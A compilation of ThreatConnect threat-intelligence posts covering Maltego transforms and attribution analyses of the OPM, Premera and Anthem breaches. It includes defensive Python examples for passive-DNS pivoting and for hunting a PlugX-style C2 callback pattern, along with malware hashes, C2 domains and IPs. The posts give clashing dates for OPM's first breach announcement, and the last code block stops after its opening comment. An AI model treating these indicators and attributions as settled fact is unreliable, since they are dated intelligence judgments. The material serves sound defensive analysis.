ThreatConnect and Maltego

ThreatConnect® has partnered with Malformity Labs LLC to develop a full transform set that allows for data from ThreatConnect to be integrated with the capabilities of Maltego.

All ThreatConnect customers can take advantage of our partnership with Malformity Labs LLC and use the Maltego transform set through the ThreatConnect® API and a provided transform server. Customers can use this to:

  • Visualize the relationship between incidents, threats, adversaries, and indicators,
  • Uncover relationships between your private data in ThreatConnect and Community Data,
  • Leverage attributes belonging to indicators and threats to create Maltego graphs without losing any of the contextual data within ThreatConnect, and
  • Pivot from ThreatConnect data and external open source data sources using other transform sets within Maltego.

With more than 100 transforms to query and pivot through ThreatConnect’s data, users can model threats and the relationships between malware, domains, IPs, and other indicators and the incidents they were observed in, the threats they are associated with, or adversary personas. The use cases are numerous, but to illustrate how it works we have picked a few scenarios that step through how a customer with access to ThreatConnect’s premium features could quickly visualize content and relationships.


Scenario 1: Visualizing Incidents tagged with Ukraine

1. Imagine you are an organization that is particularly concerned about Ukraine-themed targeting. The first step is to look for any instances of targeting, documented as Incidents, that are tagged with “Ukraine” within the ThreatConnect Subscriber Community. This yields five results.


2. For additional high-level context, you can then pull all other Tags related to these Incidents. This yields several other interesting results, including multiple matches on the use of CVE-2012-0158 (the MSCOMCTL ActiveX vulnerability widely exploited through malicious Office documents). It is notable that all the Incidents are also tagged “Russia” and “Advanced Persistent Threat”.


3. Now, to take a deeper look at the context of the Incidents, you can pull all of their Attributes from within ThreatConnect. This yields more in-depth descriptions, sourcing, and write-ups of the tactics, techniques, and procedures (TTPs) used in the Incidents.


4. Since the focus is not on targeting to or from China, you can narrow the view to the Incidents that do not carry that Tag and are Ukraine-focused only. Using Maltego, you can pull all the Indicators associated with the incidents of interest. This yields six IPs, 27 MD5 hash values (including imphashes), four Domains, and two URLs, each with its own context and associations.


The indicators found can then be used for monitoring and detection across the network. You can also continue to pivot to discover other relationships on the Indicators in the ThreatConnect Subscriber Community, in other ThreatConnect public Communities, within your own private organization data in ThreatConnect, or by leveraging other Maltego transforms to query data sources external to ThreatConnect.
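To make concrete what a transform in Scenario 1 actually hands back to Maltego, here is an added example (not ThreatConnect’s or Malformity Labs’ transform code) of a minimal Maltego local transform: it takes a Tag, selects the Incidents that carry it while excluding another Tag (step 4 above), and serialises them as Maltego entities with their ThreatConnect-style Attributes and Tags carried along as AdditionalFields, so the context is not lost on the graph. The incident data below is constructed for the example; a real transform would obtain it from the ThreatConnect API, which this code does not call.

```python
"""Added example: a minimal Maltego local transform emitting a
MaltegoTransformResponseMessage for Incidents selected by Tag.  The INCIDENTS
dataset is constructed for the example and stands in for an API response."""
import sys
import xml.etree.ElementTree as ET

# Constructed sample data (not real ThreatConnect incidents).
INCIDENTS = [
    {"name": "20140101A: Lure", "tags": ["Ukraine", "Russia", "CVE-2012-0158"],
     "attributes": {"Source": "Community", "Description": "Decoy document"}},
    {"name": "20140215C: Spearphish", "tags": ["Ukraine", "China"],
     "attributes": {"Source": "Community", "Description": "HR-themed lure"}},
    {"name": "20140320B: Watering hole", "tags": ["Ukraine", "Russia"],
     "attributes": {"Source": "Private", "Description": "Strategic web compromise"}},
]


def incidents_for_tag(tag, exclude_tags=()):
    """Incidents carrying `tag` and none of `exclude_tags` (Scenario 1, step 4)."""
    excluded = set(exclude_tags)
    return [i for i in INCIDENTS
            if tag in i["tags"] and not excluded.intersection(i["tags"])]


def build_response(incidents, entity_type="threatconnect.Incident"):
    """Serialise incidents into the XML a Maltego local transform writes to stdout."""
    msg = ET.Element("MaltegoMessage")
    resp = ET.SubElement(msg, "MaltegoTransformResponseMessage")
    entities = ET.SubElement(resp, "Entities")
    for inc in incidents:
        ent = ET.SubElement(entities, "Entity", Type=entity_type)
        ET.SubElement(ent, "Value").text = inc["name"]
        ET.SubElement(ent, "Weight").text = "100"
        fields = ET.SubElement(ent, "AdditionalFields")
        # Context (attributes and tags) rides along as fields instead of being dropped.
        for key, val in inc["attributes"].items():
            ET.SubElement(fields, "Field", Name=key, DisplayName=key).text = val
        ET.SubElement(fields, "Field", Name="tags", DisplayName="Tags").text = ", ".join(inc["tags"])
    return ET.tostring(msg, encoding="unicode")


def entity_values(xml_text):
    """Entity values from a response message (handy for checking transform output)."""
    root = ET.fromstring(xml_text)
    return [e.findtext("Value") for e in root.iter("Entity")]


if __name__ == "__main__":
    # Maltego passes the selected entity's value as the first argument.
    tag = sys.argv[1] if len(sys.argv) > 1 else "Ukraine"
    print(build_response(incidents_for_tag(tag, exclude_tags=["China"])))
```

Run it as `python transform.py Ukraine` to see the two Ukraine-only Incidents returned as entities; the `exclude_tags` parameter is the programmatic form of the “not tagged China” filter in step 4.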

Scenario 2: Pivoting on Malicious Registrants from Reverse Whois data, Passive DNS, and DNS monitoring.

1. In this scenario, you can start by taking a domain registrant email address whose domains are known to show up as malware callbacks.


2. Next, pivot via a transform to pull the Adversary entity associated with this email address.

3. Next, leveraging a running Track on the registrant email address within ThreatConnect, you can discover any second-level domains registered with that email address. With passive DNS (pDNS) integration you can also discover any third-level domains that have been observed “in the wild”. One transform query on the graph shows all domains associated with the Adversary. To keep the graph readable, we are looking at just a small subset of the known domains.


4. Now, you can go even deeper and utilize the DNS resolution monitoring for domain indicators within ThreatConnect to observe any overlap in IP address resolutions with date and time of resolution annotated. This yields 22 IP addresses for the over 80 domains in your subset.


Some of the IP addresses will undoubtedly be parking IPs (such as the loopback address), but others will show a historic trend of use for command and control. Leveraging passive DNS again within ThreatConnect, you can check whether any other suspicious domains have resolved to these IP addresses and assess them further.
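The pivot in steps 3 and 4 can be written out as a script. The following is an added example (not ThreatConnect’s code) that takes passive-DNS style resolution records for a set of domains, discards parking, loopback and non-routable IPs, groups the remaining resolutions by IP, and reports IPs shared by more than one domain together with each resolution window and any time overlap between domains. The records and IP addresses are constructed for the example, not real observations, and the parking-IP list is an assumption of commonly seen placeholders.

```python
"""Added example: IP-resolution overlap across a set of domains, in the spirit of
Scenario 2 step 4.  RECORDS is constructed sample data (domain, ip, first_seen,
last_seen), not real passive DNS."""
import ipaddress
from collections import defaultdict
from datetime import date

RECORDS = [
    ("mail.example-c2[.]com",   "51.100.7.20",  date(2014, 5, 1),  date(2014, 6, 30)),
    ("update.example-c2[.]com", "51.100.7.20",  date(2014, 6, 15), date(2014, 8, 1)),
    ("news.example-c2[.]com",   "127.0.0.1",    date(2014, 7, 1),  date(2014, 7, 2)),
    ("news.example-c2[.]com",   "51.100.7.20",  date(2014, 9, 1),  date(2014, 9, 30)),
    ("cdn.example-c2[.]com",    "185.22.64.30", date(2014, 5, 1),  date(2014, 5, 3)),
]

# Assumed placeholder addresses often seen while a domain is registered but idle.
PARKING_IPS = {"0.0.0.0", "127.0.0.1", "1.1.1.1", "8.8.8.8"}


def defang(domain):
    """Turn the defanged form used in reports back into a plain hostname."""
    return domain.replace("[.]", ".")


def is_parking(ip_text):
    """Loopback, unspecified, private/reserved space and known placeholders are not C2."""
    if ip_text in PARKING_IPS:
        return True
    ip = ipaddress.ip_address(ip_text)
    return (ip.is_loopback or ip.is_private or ip.is_reserved
            or ip.is_unspecified or ip.is_multicast)


def shared_infrastructure(records, min_domains=2):
    """Map each routable IP to {domain: (first_seen, last_seen)} for IPs used by
    at least `min_domains` distinct domains; repeated records are merged."""
    by_ip = defaultdict(dict)
    for domain, ip, first, last in records:
        if is_parking(ip):
            continue
        d = defang(domain)
        prev = by_ip[ip].get(d)
        by_ip[ip][d] = (min(first, prev[0]) if prev else first,
                        max(last, prev[1]) if prev else last)
    return {ip: doms for ip, doms in by_ip.items() if len(doms) >= min_domains}


def overlapping_pairs(domains):
    """Domain pairs whose windows on the same IP overlap in time, with the shared
    window: concurrent use is a stronger sign of live C2 than sequential parking."""
    items = sorted(domains.items())
    pairs = []
    for i, (d1, (s1, e1)) in enumerate(items):
        for d2, (s2, e2) in items[i + 1:]:
            if s1 <= e2 and s2 <= e1:
                pairs.append((d1, d2, max(s1, s2), min(e1, e2)))
    return pairs


if __name__ == "__main__":
    for ip, doms in shared_infrastructure(RECORDS).items():
        print(ip)
        for d, (s, e) in sorted(doms.items()):
            print(f"  {d}: {s} -> {e}")
        for d1, d2, s, e in overlapping_pairs(doms):
            print(f"  concurrent: {d1} / {d2}: {s} -> {e}")
```

In the sample data the loopback record for news.example-c2[.]com is dropped as parking, the single-domain IP is dropped by `min_domains`, and one concurrent window (mid-June 2014) surfaces between two domains on the shared IP; the same IP list is what you would then feed back into passive DNS to look for further suspicious domains.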

This allows you not only to use these domains and indicators as IOCs across your network, but also to proactively monitor known infrastructure, such as known command and control IPs, domains, and the registrant address itself, for new activity. This creates a predictive defense against a known adversary, following their movements using concepts true to the Diamond Model of Intrusion Analysis.



OPM Breach Analysis: Update

OPM Breach Analysis

As highlighted in our recent webinar with Rick Holland, when there is a security event of great magnitude, organizational leadership will want to know as much as possible about the technical WHAT and HOW, as well as the WHO and the WHEN.

In many cases, not all of these questions can be answered definitively; however, our inability to answer specific questions does not negate the intelligence requirement, nor does it allow the decision maker to sidestep the decision point they face. Below are some of the questions that a variety of organizations have asked us over the past few days about our analysis of the recent OPM breach, along with a recap of the public reporting that supports our position(s).

Who do we believe is responsible?

Based on open source research and technical analysis, we believe that China-based actors operating on behalf of the government of the People’s Republic of China (PRC) are responsible for the 2015 OPM breach. Although the specific group(s) responsible for this activity have proven to be somewhat amorphous, many independent researchers and threat intelligence analysts familiar with this ongoing activity will concur that the ultimate beneficiary of the stolen data is the central government in Beijing.

We stress that it is most likely a cohort of Chinese actors resourced and directed by a common benefactor. The diversity of expert opinion and the ambiguity the security industry attaches to this particular threat may be by design. This would lend more credence to the working “Digital Quartermaster” theory originally introduced by FireEye and recently referenced in PricewaterhouseCoopers (PwC) UK’s Scanbox II Threat Intelligence Bulletin, which covered facets of this particular threat.

One thing is certain: despite the uncertainty and lack of consensus, this activity has been the catalyst for increased shared awareness, technical information sharing and analytic collaboration.

Why we believe it is China

  • We feel that there are transitive properties associated with the technical aspects of the activity observed thus far.
    • We can strongly tie Chinese based actors to faux Wellpoint (Anthem), Premera, Empire BlueCross Blue Shield and CareFirst themed infrastructure.
    • We can tie infrastructure observed within a campaign that targeted a Virginia-based defense contractor VAE, Inc. to a named Chinese professor at Southeast University with ties to Beijing TopSec.
      • This campaign used the Sakula malware with the same digital signature seen in the Wellpoint-themed campaign. This infrastructure was configured for survivability within the VAE, Inc. enterprise.
      • Activity and dates associated with the faux VAE, Inc. infrastructure align with the timeline of a hacking competition sponsored by the Chinese Professor, Southeast University and TopSec Beijing, both with organizational ties to the Ministry of State Security (MSS).
    • We can strongly tie malicious infrastructure that maintains an Office of Personnel Management (OPM) theme to registration patterns observed with the faux VAE, Inc. themed infrastructure.
      • The actors used GoDaddy to register faux VAE, Inc. and OPM themed domains.
      • In both instances, actors falsified domain registration data with Marvel “Avengers” themed first and last names.
      • Attackers also used “throw away” GMX email accounts that followed the pattern <10 random alphabetic characters>@gmx[.]com.
      • The timeline of faux OPM-themed infrastructure activity is congruent with the official OPM timeline.

Have we seen this type of activity before?

The theft of government PII, and even a breach into OPM’s network, is nothing new. In 2013, the private firm USIS (a contractor retained by OPM to conduct background investigations on federal employees) reported falling victim to a sophisticated state-sponsored network intrusion. This breach received widespread coverage and also great scrutiny and criticism from lawmakers on Capitol Hill.

As time went on, details of the compromise began to emerge. In a report compiled by Stroz Friedberg, the investigation revealed that the attackers had gained access to USIS networks via an unidentified vulnerability in an SAP enterprise resource planning (ERP) software package. Fast forward to March 2014, just a few months after the USIS hack: OPM would be breached, first announcing the breach in July 2014.

Additionally, consider that the Wellpoint/Anthem, Premera, Empire and CareFirst hacks all had one thing in common: all four organizations are part of the Blue Cross Blue Shield Association. BCBS provides healthcare services to the Federal workforce.

In the case of the Spring 2015 healthcare breaches, we have reported in the past that the attack nexus was indeed China, likely state-sponsored in nature, and relied upon the Sakula malware to gain initial entry.  Additionally, as was the case in the USIS and OPM breaches, similar PII data was targeted (names, employment history, social security numbers, etc.).  All of these things considered suggest a greater degree of correlation as opposed to mere coincidence.

Were there any previous indications or warning?

In 2014, Novetta and a number of supporting industry organizations, including ThreatConnect, banded together to produce the Operation SMN: Axiom Threat Actor Group Report, a detailed report containing information pertinent to Chinese APT activity with an emphasis on HiKit malware. Of note, the report stated: “Among the industries we observed targeted or potentially infected by Hikit [included] Asian and Western government agencies responsible for [a variety of services such as] Personnel Management.”

A statement from such an industry group should have served as a key warning to government entities which were charged with conducting Personnel Management and warehousing PII.

Where did the HiKit Rootkit Originate?

At the 2015 Kaspersky Security Analyst Summit, Kris McConkey of PricewaterhouseCoopers (PwC) UK delivered a compelling presentation based on research from fellow PwC China research analyst Michael Yip.


McConkey highlights the development of Adversary Intelligence surrounding a China-based actor likely responsible for developing the HiKit capability, as well as associations with a particular ZoxPNG sample. Both HiKit and ZoxPNG would be considered “tier one” unique custom capabilities, as opposed to lower-end, commonly distributed implants such as ZxShell, PlugX, Gh0st or PoisonIvy.


It is critical to highlight that we are not drawing lines between Axiom / Hikit and current activity, other than to note that Chinese actors posed a legitimate threat to Western government personnel management organizations. Irrespective of which threat posed the greater risk, there were indications that the Chinese maintained both the capability and the intent to target OPM, as witnessed in 2014.

Is the OPM themed infrastructure related?

Based on our current understanding of the attackers and this activity, ThreatConnect suspects that the recent OPM attackers may have chosen the specific infrastructure naming convention (opmsecurity[.]org and opm-learning[.]org) to emulate an official OPM training resource that has been maintained outside of the OPM enterprise for some time. This emulation technique has been observed consistently across these seemingly related events.

If we are to couple the terms OPM (both Security AND learning) within a .org TLD, we identify the following web resources.


These online training resources currently fall outside of the standard .gov enterprise and, ironically, provide online training and security awareness training services for OPM as well as numerous other federal departments, agencies and commercial clients.

Analyst Comment: Currently there is no evidence that suggests golearnportal[.]org has been co-opted or is compromised in any way.



As we highlighted in late February, the domain opm-learning[.]org was registered on July 29, 2014 by “tony stark” (vrzunyjkmf@gmx[.]com) and is observed active within pDNS as early as July 30, 2014, resolving to 50.117.38[.]170. This IP belongs to Egihosting, (EGI) a company based out of California, but it is known to resell VPS services in China.

EGI’s own marketing copy describes the network this way: “EGI’s network was designed with redundancy in mind, including a multi-homed setup of upstream providers like Global Crossing, nLayer, HE.NET and Highwinds. Our network has excellent direct connectivity to China and Asian networks and provides optimal routes to both domestic and other international destinations, including the often problematic and congested Chinese and Asian markets.”


It is important to note that OPM announced the first breach on July 10, 2014. The actors registered opm-learning[.]org 19 days later, on July 29, 2014, and on July 30, 2014 the domain resolved to a domestic VPS service that boasts optimal routes to China. At the time of our reporting in February 2015, we assumed that the opm-learning[.]org infrastructure was a remnant of ongoing OPM 2014 breach activity. We now assess that opm-learning[.]org was likely either:

  • Used as a means for the original actors to reconstitute lost access from the initial 2014 breach.
  • Used by another group or team which was moving to establish new access.

Needless to say, a 19 day window from the 2014 breach announcement to establishment of new infrastructure is a noteworthy datapoint.


On the heels of the recent 2015 OPM breach announcement, we worked with our friends at DomainTools, who helped us apply a custom search technique that we had been experimenting with, from which we shared notable outputs to our ThreatConnect Community. A refinement of that experiment yielded the domain opmsecurity[.]org.

Retrospective analysis of this domain indicates that it was registered on April 25, 2014 (four days before the registration of we11point[.]com). The first observed resolution outside of GoDaddy parking was on December 18, 2014, to 148.163.104[.]35, where it remained until June 3, 2015 (a day before the official OPM breach announcement).

According to an official OPM FAQ, the intrusion occurred in December 2014, OPM became aware of the intrusion in April 2015, and became aware of potentially compromised data in May 2015. This timeline is congruent with the technical observables associated with the opmsecurity[.]org infrastructure. ThreatConnect assesses with high confidence that the opmsecurity[.]org infrastructure was leveraged within the 2015 OPM breach.


The IP address 148.163.104[.]35 was also the resolution for the suspicious No-IP dynamic DNS domains ladygagagaga.serveblog[.]net and jamlitop3.zapto[.]org from April 27, 2015 to early May 2015.


Researching both ladygagagaga.serveblog[.]net and jamlitop3.zapto[.]org, we find that as of June 9, 2015, both C2 domains resolve to 107.167.75[.]138, an address belonging to the Chinese VPS provider 370Host[.]net and purportedly hosted in a colocation facility in Phoenix, Arizona.

What malware was used?

ThreatConnect assesses with moderate to high confidence that the opmsecurity[.]org domain was used by a PlugX variant, based on a single VirusTotal URL submission. This URL contains the C2 callback URI structure “/DJMoqoirjvmimzzv/view/update?id=”, which is associated with the malicious DLLs MD5: 683a3e4448b7254d52363d74e8687f36 and MD5: c28ecee9bea8b7465293aeeef4316957. Multiple antivirus vendors detect these DLL binaries as PlugX, which is likely an accurate classification: the “/update?id=” callback URI segment is specifically associated with the Destroy RAT (aka Sogu) family of malware, the direct precursor to PlugX.
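The callback URI shape above is the kind of observable that can be hunted for in web-proxy logs. The following is an added example (not ThreatConnect’s code) that scans Squid-style access log lines for two things: requests to the opmsecurity[.]org host named in the analysis, and requests whose path has the form /<run of letters>/view/update with an id= query parameter. The sample log lines are constructed for the example, and the path regex generalises from the single URI observed here (the length bounds on the random segment are an assumption), so it is a hunting heuristic to review, not a signature to block on.

```python
"""Added example: hunting for Sogu/PlugX-style callback URIs in proxy logs.
SAMPLE_LOG is constructed data; the path pattern is generalised from the one
observed URI and is an assumption, not a vendor signature."""
import re
from urllib.parse import urlsplit, parse_qs

# Host indicator taken from the analysis above (defanged there, live here).
C2_HOSTS = {"opmsecurity.org"}

# Path of the form /<8-24 letters>/view/update; the query must carry an id= parameter.
SOGU_PATH = re.compile(r"^/[A-Za-z]{8,24}/view/update$")

# Squid native access log: ts elapsed client action/code bytes method url ...
LOG_LINE = re.compile(
    r"^(?P<ts>\S+) \S+ (?P<client>\S+) \S+ \S+ (?P<method>[A-Z]+) (?P<url>\S+)")

# Constructed sample log lines (not real traffic).
SAMPLE_LOG = """\
1433380800.101 120 10.1.2.3 TCP_MISS/200 512 GET http://opmsecurity.org/DJMoqoirjvmimzzv/view/update?id=1 - DIRECT/148.163.104.35 text/html
1433380801.222 90 10.1.2.4 TCP_MISS/200 2048 GET http://www.example.org/news/view/update?id=42 - DIRECT/192.0.2.1 text/html
1433380802.333 80 10.1.2.5 TCP_MISS/200 100 GET http://cdn.example.net/AbCdEfGhIjKlMn/view/update?id=7 - DIRECT/192.0.2.2 text/html
1433380803.444 70 10.1.2.6 TCP_MISS/200 100 GET http://cdn.example.net/AbCdEfGhIjKlMn/view/update - DIRECT/192.0.2.2 text/html
"""


def classify(url):
    """Return 'c2-host', 'uri-pattern' or None for a single request URL."""
    parts = urlsplit(url)
    host = parts.hostname or ""
    if host in C2_HOSTS:
        return "c2-host"          # known bad host, regardless of path
    if SOGU_PATH.match(parts.path) and "id" in parse_qs(parts.query):
        return "uri-pattern"      # shape matches but host is unknown: review it
    return None


def scan(log_text):
    """Return (client, url, verdict) for every log line that triggers."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue                # not a parseable access-log line
        verdict = classify(m["url"])
        if verdict:
            hits.append((m["client"], m["url"], verdict))
    return hits


if __name__ == "__main__":
    for client, url, verdict in scan(SAMPLE_LOG):
        print(f"{verdict:12} {client:12} {url}")
```

On the sample data the short `/news/view/update?id=42` path does not trigger (the random segment is far shorter than anything observed), the request with a matching shape but no `id=` parameter does not trigger, and the two real hits are reported with different verdicts so an analyst can prioritise the known host over the pattern-only match.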

Similar binaries found in VirusTotal are as follows:

  • 23DE2AFF9DBE277C7CE6ABBD52E68CE6
  • 4CED16CEB9C3BC50787303EC5C4DA0B8
  • BDDF02095971F6A309C68CFDFAAA3648
  • C51F43F860535CFA9B2F4528A5FE2877

Each of these binaries contains the hardcoded command and control IP address 46.21.150[.]165 (Fremont, California). This IP address also has passive DNS resolution history for the following suspicious domains:


This domain was initially registered by abit572@yahoo[.]com, then switched to a nine-character, likely pseudorandom, GMX registrant, ton0251sx@gmx[.]com. The fact that this domain is registered by a seemingly random registrant is noteworthy, considering a similar registration profile was used in the faux OPM domains listed above. This domain may be a typosquat impersonating a reference to Binghamton, a city in New York and a campus of the State University of New York.


This domain was registered in 2012 by 904726926@qq[.]com, then again on April 16, 2014 by the Chinese reseller “Li Ning” (li2384826402@yahoo[.]com), who has been identified previously in similar activity.


This dynamic DNS domain currently resolves to 103.6.207[.]37 (Indonesia).

The use of a GMX registrant and the Li Ning reseller in the overlapping domains closely mirrors the registrant profiles associated with the Sakula campaign activity in the Wellpoint and VAE, Inc. targeting campaigns, as well as in the faux OPM domains highlighted above. This leads ThreatConnect to assess with moderate confidence that the PlugX APT malware activity associated with the VirusTotal URL and related hashes is attributable to the actor that is using Sakula and leveraging the faux OPM domains. The timing of registrations and resolutions between the original June 2014 OPM breach announcement and the 2015 OPM breach announcement is noteworthy.


To many, it may seem absurd that a foreign government would want to gather a database of federal employee PII. Some have noted that this information is likely of greater value to criminal actors, and that it wouldn’t be nearly as helpful to enable spearphishing in the future, as social media profiles often hold higher quality intelligence used to socially engineer a victim.  While all of this is true to varying degrees, consider that we may be looking at this from the narrow perspective of the short-term.  Building up a PII database could fulfil a number of strategic goals well into the future.  The long game strategy is characteristic of Chinese thought, and may very well be what is at play here.


Premera Latest Healthcare Insurance Agency to be Breached

Similarities with Wellpoint/Anthem Event Should be Understood

The recent announcement from Premera Blue Cross Blue Shield that it has fallen victim to a sophisticated cyber attack that reportedly compromised the medical and financial data of 11 million members is the latest in a series of high-profile cyberattacks targeting the medical and healthcare industry. ThreatConnect’s analysis has uncovered similarities between the independent Wellpoint- and Premera-themed events.

Before we dig into the analysis, it is important to understand our methodology and goal in publishing our findings. As we see it, threat intelligence begins when you can connect the dots of past events, preferably from multiple independent data sources, to make sense of the threats that you may be seeing now – which then allows you to make better strategic decisions to mitigate risks in the future. The goal of this third party analysis is not to draw conclusions of exact details of either the Anthem or Premera breaches, but rather begin to answer the question that many observers ask in the wake of such a revelation, “How does this impact me?”

To answer that question, you don’t need every detail of a specific organization’s intelligence. You just need the data actually relevant to you in a format you can digest. By calling to light common indicators of compromise and other key similarities between notable events, organizations can break through the log jam of speculation and make informed decisions and formulate a risk mitigation process.

In February 2015, ThreatConnect published an in-depth blog post of its third-party analysis of notable events which maintained an Anthem/Wellpoint theme. Some of the biggest takeaways from this incident were:

  • Context suggested possible Chinese state-sponsored involvement.
  • Malicious binaries used in several campaigns were digitally signed by “DTOPTOOLZ Co.”, a distinctive stolen code-signing certificate.
  • A common character replacement technique was used in the staging of malicious Premera and Wellpoint themed infrastructure – both observed within five months of each other.

All of those points create very compelling technical associations between what would otherwise be seemingly unrelated events. As we continued to uncover the nuanced details, we saw mounting evidence that this may not be isolated activity. To demonstrate this, let’s walk through the analysis.

One of the strongest initial indicators that tipped us to the possible targeting of Anthem/Wellpoint was the registration and staging of malicious domains using the “we11point[.]com” theme, which was clearly masquerading as legitimate Wellpoint infrastructure. Notice the subtle character replacement technique used here (the two lowercase “l” characters replaced with the digit “1”) to disguise the nefarious activity, as this will be an important pivot point shortly. Through our analysis, we were able to determine that the Anthem/Wellpoint infrastructure staging began as early as April 2014.

Given that the DTOPTOOLZ certificate was so specific, we had strong reason to believe that other samples carrying this digital signature would likely be related to other events.

Pivoting off of the stolen DTOPTOOLZ certificate led to the discovery of another malicious file first observed in December 2013. The binary was engineered to call out to an IP address that had hosted the imposter domain prennera[.]com as early as December 11, 2013, the very same day the malware was first observed. Again, note the character replacement technique, subsequently used in the Anthem/Wellpoint faux infrastructure.

As reported in our blog post The Anthem Hack: All Roads Lead to China, the use of the stolen certificate was not in fact unique to the targeted Anthem attack, but rather appeared to be tradecraft of a very sophisticated threat group targeting more than one organization, a group plausibly interested in collecting personally identifiable information (PII) of individuals associated with the U.S. Federal Government. Premera Blue Cross Blue Shield may have been one such organization.

All things considered, and contrary to initial media reports, it appears feasible that attempts to breach Premera, or at least to test its weaknesses, occurred as early as December 2013.


The Anthem Hack: All Roads Lead to China

UPDATE: Premera Latest Healthcare Insurance Agency to be Breached

When news of the Anthem breach was reported on February 4th, 2015, the security industry quite understandably went wild. A breach of this magnitude was certainly unprecedented. Naturally, many industry professionals were keenly interested in digging into this incident to see what could be uncovered, and the research team at ThreatConnect was no exception. Thanks to our API and third-party partner integrations, we were able to use ThreatConnect to quickly uncover a wealth of intelligence even though we initially had little investigative lead information and context to work from; being able to start from thin leads is a key requirement of any Threat Intelligence Platform (TIP). However, before we delve into what we were able to uncover, let’s briefly review the facts as they stood in the wake of the initial discovery announcement.

What We Know:

On the morning of February 4th, 2015, several major news outlets broke the story that Anthem, Inc.’s network defenses had been breached. According to a statement from Anthem’s CEO, the company fell victim to a “very sophisticated external cyber attack,” and the hackers “obtained” the personally identifiable information (PII) of approximately 80M customers.  This included social security numbers, birthdays, street addresses, phone numbers and income data – plenty of information to enable identity theft. This was a significant event for several reasons:

  • Anthem, formerly known as Wellpoint, is the largest managed healthcare company in the Blue Cross Blue Shield Association, and by extension, one of the largest healthcare organizations in the United States.  As such, any compromise, no matter how insignificant, would likely impact countless individuals.
  • Blue Cross Blue Shield provides healthcare coverage for about half the U.S. federal workforce.  This means that their information was potentially compromised too.
  • Unlike the Sony hack which was destructive in nature and meant to send a message for coercive purposes, the Anthem compromise was purportedly very covert, a fact which may suggest something about the adversary’s motives.
  • As of late February 2015, there have not been any indications that the exfiltrated PII data was immediately commoditized on the black market for the purpose of enabling identity theft, as was the case in the Home Depot Breach.

Filling the Gaps:

Obviously, these high-level observations do not provide cybersecurity researchers a great deal of information to work with. However, when presented within the context of a Threat Intelligence Platform (TIP), an incomplete trail of evidence can highlight intelligence gaps, a study of which can orient threat researchers towards their analytic objectives.  To this end, let’s examine what we wanted to discover in the context of the Anthem breach:

  • Who was responsible for the attack?
  • What was the objective of the attack?  Was it cyber theft, an espionage operation, or something different?
  • Who was targeted in the attack?  The answer to this question, obscured as it may be, would likely shed some light on the objective of the breach.
  • What was the timeline of the activity?

The real power of a Threat Intelligence Platform is demonstrated when you are able to collect and maintain a robust dataset of threat indicators, both past and present, which can help orient you in the right direction in the wake of a newly discovered breach.  Even when you do not have a good deal of information to start with (for example a file hash, or an IP address), you may find leads by pivoting through archived datasets until you uncover key pieces of the puzzle.  In the case of the Anthem breach, we were able to do just that.

Anthem Themed Infrastructure & Signed Malware:

In September 2014, the ThreatConnect Research Team observed a variant of the Derusbi APT malware family, MD5: 0A9545F9FC7A6D8596CF07A59F400FD3, which was signed with a valid code-signing certificate issued to the Korean company DTOPTOOLZ Co. Derusbi is a family of malware used by multiple actor groups but associated exclusively with Chinese APT. ThreatConnect Research began tracking the DTOPTOOLZ signature for additional signed malware samples and memorialized them within our Threat Intelligence Platform over time.

Analyst Comment: The DTOPTOOLZ signature has also been observed in association with Korean Adware that is affiliated with the actual DTOPTOOLZ Co. This adware should not be confused with the APT malware that is abusing the same digital signature.

Later, in mid-November, we discovered another implant that was digitally signed with the DTOPTOOLZ signature. This implant, MD5: 98721c78dfbf8a45d152a888c804427c, was from the “Sakula” (aka Sakurel) family of malware, a known variant of the Derusbi backdoor, and was configured to communicate with the malicious command and control (C2) domains extcitrix.we11point[.]com and www.we11point[.]com. Through our Farsight Security passive DNS integration, we uncovered that this malicious infrastructure was likely named in such a way as to impersonate the legitimate Wellpoint IT infrastructure.

Passive DNS and historic DomainTools Whois data also provided insights that helped establish an initial timeline dating back to April 2014, when the faux domains came into existence and were later operationalized by the attackers. A Threat Intelligence Platform should allow for analysts to easily put together and organize such insights, collaborate around relevant analysis internally, and share the finished analysis with external industry groups and organizations. In the hopes that our community members could benefit from or provide further insight into this suspicious incident, we immediately shared our threat intelligence including indicators, signatures and analytical context to the ThreatConnect Medical and Health Community on November 13, 2014. This included sending out a notification to all stakeholders as well as our followers on Twitter.

When the Anthem breach later came to light in early February, we re-shared the signatures, indicators and context freely to the entire ThreatConnect user base. As we dug further, we expanded our understanding of the malicious we11point[.]com infrastructure, taking particular interest in subdomains such as “extcitrix.we11point[.]com” and “hrsolutions.we11point[.]com”. Note the “citrix” and “hr” (human resources) prefixes the adversary used in the May 2014 timeframe to mirror legitimate remote-access infrastructure and employee benefits resources. This provided initial insight into the likely targeting themes and vectors the adversary may have used when initiating the campaign.


The fact that the malicious infrastructure closely mirrored other legitimate Wellpoint infrastructure supported our hypothesis that the Derusbi / Sakula malware was configured to operate and persist within a specific target enterprise.

Possible Premera Blue Cross Infrastructure:

Retrospective analysis of other targeted malware samples using the DTOPTOOLZ Co. digital signature led to the identification of an “HttpBrowser” / “HttpDump” implant MD5: 02FAB24461956458D70AEED1A028EB9C (OpenOfficePlugin.exe), which was first observed on December 11, 2013. Although this malware sample is not Derusbi / Sakula, it too is strongly believed to be associated with Chinese APT activity and in fact may have also been involved in a Blue Cross Blue Shield targeting campaign as early as December 2013.


This particular binary is configured to connect to the static IP address 142.91.76[.]134. Passive DNS for this IP indicates that on December 11th, 2013, the same date the malware sample was first observed, the domain prennera[.]com also resolved to 142.91.76[.]134. It is believed that the prennera[.]com domain may have been impersonating the healthcare provider Premera Blue Cross, with the attackers using the same character replacement technique (replacing the “m” with two “n” characters within the faux domain) that would be seen five months later in the we11point[.]com command and control infrastructure.

Section Summary:

  • The Derusbi / Sakula malware implant types are unique in that they have traditionally been seen within Chinese APT espionage campaigns.
  • The “HttpBrowser” / “HttpDump” malware implant (while a different family of malware than Derusbi / Sakula) is also believed to be of Chinese origin, and was also digitally signed with the DTOPTOOLZ digital signature. This implant connected to a C2 node that overlapped with prennera[.]com.
  • We believe that the prennera[.]com domain may be impersonating Premera Blue Cross (, using a similar character replacement technique seen in the we11point[.]com campaign.
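The character-replacement pattern described above (an “l” rendered as “1” in we11point[.]com, an “m” rendered as “nn” in prennera[.]com) lends itself to a simple defensive check over newly registered domains or passive DNS output. The following is an added example written for this page, not ThreatConnect code; the watched brand list, the substitution table and the sample domain feed are constructed for illustration, and the public-suffix handling is deliberately naive.

```python
from typing import Dict, List, Optional, Tuple

# Brand names the defender wants to protect. Constructed for this example;
# a real deployment would load the organisation's own names and those of its
# partners and providers.
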